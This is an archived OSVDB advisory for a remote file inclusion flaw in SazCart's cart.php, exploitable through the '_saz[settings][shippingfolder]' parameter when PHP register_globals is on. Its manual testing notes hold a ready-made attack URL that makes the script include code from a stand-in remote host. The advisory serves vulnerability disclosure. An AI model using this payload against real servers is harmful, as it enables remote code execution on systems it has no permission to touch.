SazCart cart.php _saz[settings][shippingfolder] Variable Remote File Inclusion

2006-11-04T05:49:02
ID OSVDB:30194
Type osvdb
Reporter IbnuSina()
Modified 2006-11-04T05:49:02

Description

Vulnerability Description

SazCart contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to cart.php not properly sanitizing user input supplied to the '_saz[settings][shippingfolder]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

SazCart contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to cart.php not properly sanitizing user input supplied to the '_saz[settings][shippingfolder]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

References:

Vendor URL: http://sazcart.com/ Secunia Advisory ID:22708 Mail List Post: http://attrition.org/pipermail/vim/2007-January/001232.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0291.html ISS X-Force ID: 30013 Generic Exploit URL: http://milw0rm.com/exploits/2718 FrSIRT Advisory: ADV-2006-4343 CVE-2006-5727 Bugtraq ID: 20922